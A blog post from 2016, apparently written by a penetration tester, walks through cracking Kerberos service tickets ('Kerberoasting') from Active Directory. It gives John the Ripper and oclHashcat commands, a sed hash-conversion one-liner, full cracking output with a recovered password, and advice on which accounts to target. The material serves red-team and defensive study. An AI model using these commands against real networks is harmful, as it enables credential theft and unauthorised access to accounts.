Published: 22 May 2016 - 07:35 -0500
Previous works: There has been a number of different blog posts, presentations and projects that have happened before this post and I will reference a number of them during the post and at the end have a link to all that I know about. If you know of any works on this subject that I am missing please submit a comment below and I’ll will be sure to reference it.
Attacker KB Link: (to be updated later)
Common Findings DB Link: (to be updated later)
Now we start cracking the tickets we have and hopefully one will break. The problem with this format is that it takes a LONG time to crack, not as slow as some, but certainly not as fast as NTLM or the like, so pick your targets carefully as the more tickets you try and crack at once the slower it’s going to go.
Cracking SPN tickets
John the Ripper
- Format added September 30th 2015: https://github.com/magnumripper/JohnTheRipper/commit/05e514646dfe5aa65ee48774571c0169f7e25a53
If you aren’t already using the magnumripper version of John The Ripper you should be, it’s the latest and great and usually has all of the updated formats, fixes, and speedups. In this case it’s also the only version that has the KRB5TGS format.
root@wpad:~/johntheripper/run# ./kirbi2john.py /root/empire-dev/downloads/BDW3E2G2ZRKCUS3B/*.kirbi > /tmp/johnkirb.txt root@wpad:~/johntheripper/run# ./john /tmp/johnkirb.txt --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 11 password hashes with 11 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Warning: OpenMP is disabled; a non-OpenMP build may be faster Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:07 3.35% (ETA: 23:38:44) 0g/s 69751p/s 767263c/s 767263C/s 129700..123junior ASDqwe123 ($krb5tgs$unkown) ASDqwe123 ($krb5tgs$unkown)
w00t! Easy passwords. These are valid account passwords and you should be able to do with them whatever that account can do. We will explore the ability to use them as silver tickets later in this post but don’t loose sight that you have a completely valid new account that has access somewhere.
John The Ripper is fast, but we need that GPU speed for slow hashes like this. Again, we are on the cutting edge of hashes it seems so we are going to have to build the Github version of oclHashcat
Support added to oclHashcat to crack Kerberos 5 TGS-REP: https://t.co/wsL2VUihNR (Our first algorithm contributed by community, yay!)— hashcat (@hashcat) February 17, 2016
Luckily, building it is pretty straight forward: https://github.com/hashcat/oclHashcat/blob/master/docs/BUILD.md
Problem is that we have hashes in John the Ripper format and we have to get them into a format that oclHashcat understands:
Example Hashes: https://hashcat.net/wiki/doku.php?id=example_hashes
13100 Kerberos 5 TGS-REP etype 23 - $krb5tgs$23$*user$realm$test/spn*$140964709dbdeccbc6121b675ccfb8b2$af937e9d5691b74600e514a3105976f1a8ddb2eed3aeb008ea74ff50bee7a65f14e8c1cbbc360687e6d867c9fbe2e4b2004d0584f0c283a18f613c69c756f78c001647e01da84466f59c655a25913b0cb4e42f0dc88f461e921441da40d6fb56d40545f71b841d00f019f135eb93c2357253796e5dc7da8a455d4fe17c966c3ea3ac620eb5e51c44c8a9cc48d385680c64c519e2113497315e7d7623044d48e2272bd9836b754755c3494040b487757a936780daeff859dd2c8839
If you got your tickets from kirbi2john.py you can convert them using
cat kirbi2johnoutput.txt | sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'
If you got them from Impacket, they are already in a format that is compatible with both John the Ripper and oclHashcat.
Here is the speed results that Atom was getting using his AMD R9 GPU:
root@sf:~/oclHashcat# ./oclHashcat -m 13100 hash -w 3 -a 3 ?l?l?l?l?l?l?l oclHashcat v2.01 (g0891e39) starting... Device #1: Hawaii, 2858/4025 MB allocatable, 1010Mhz, 44MCU Device #2: AMD FX(tm)-8120 Eight-Core Processor, skipped Hashes: 1 hashes; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Applicable Optimizers: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt * Brute-Force Watchdog: Temperature abort trigger set to 90c Watchdog: Temperature retain trigger set to 80c Device #1: Kernel /root/git/oclHashcat/kernels/m13100_a3.919aa8b9.kernel (234320 bytes) Device #1: Kernel /root/git/oclHashcat/kernels/markov_le.919aa8b9.kernel (36184 bytes) Device #1: autotuned kernel-accel to 64 Device #1: autotuned kernel-loops to 50 [s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => $krb5tgs$23$*user$realm$test/hashcat*$08e2261b7a89e56f530b2f7e0620fe8b$ecdca97c13814c95810d7706faf986dad98d06ba033fc5a45fbe9b417b855db5:hashcat Session.Name...: oclHashcat Status.........: Cracked Input.Mode.....: Mask (?l?l?l?l?l?l?l)  Hash.Target....: $krb5tgs$23$*user$realm$test/hashcat*$08e... Hash.Type......: Kerberos 5 TGS-REP etype 23 Time.Started...: Wed Feb 17 08:33:57 2016 (5 secs) Speed.Dev.#1...: 111.0 MH/s (80.83ms) Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.......: 252313600/8031810176 (3.14%) Rejected.......: 0/252313600 (0.00%) Restore.Point..: 0/456976 (0.00%) HWMon.GPU.#1...: 0% Util, 42c Temp, 20% Fan Started: Wed Feb 17 08:33:57 2016 Stopped: Wed Feb 17 08:34:04 2016
Where I was only getting about half of that speed against one hash (NVidia GTX 970):
Session.Name...: oclHashcat Status.........: Running Rules.Type.....: File (rules\dive.rule) Input.Mode.....: File (..\dictionarys\rockyou.txt) Hash.Target....: (snip) Hash.Type......: Kerberos 5 TGS-REP etype 23 Time.Started...: Sun May 22 01:32:50 2016 (25 secs) Time.Estimated.: Sun May 22 09:04:48 2016 (7 hours, 31 mins) Speed.Dev.#1...: 57894.8 kH/s (14.37ms) Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
And as you can see, going against 100 hashes pushed the wait time out to 30 days vs. 7 hours.
Session.Name...: oclHashcat Status.........: Running Rules.Type.....: File (rules\dive.rule) Input.Mode.....: File (..\dictionarys\rockyou.txt) Hash.Target....: (snip) Hash.Type......: Kerberos 5 TGS-REP etype 23 Time.Started...: Sun May 22 01:35:16 2016 (16 secs) Time.Estimated.: Wed Jun 22 14:28:17 2016 (31 days, 12 hours) Speed.Dev.#1...: 55873.1 kH/s (14.11ms) Recovered......: 0/100 (0.00%) Digests, 0/1 (0.00%) Salts
So pick your targets and just go after the ones that are old / password hasn’t been changed in years.
- Tim Medin’s Slides - [Kicking the Guard Dog of Hades - slides](https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf)
- Tim Medin’s Video - Kicking the Guard Dog of Hades - video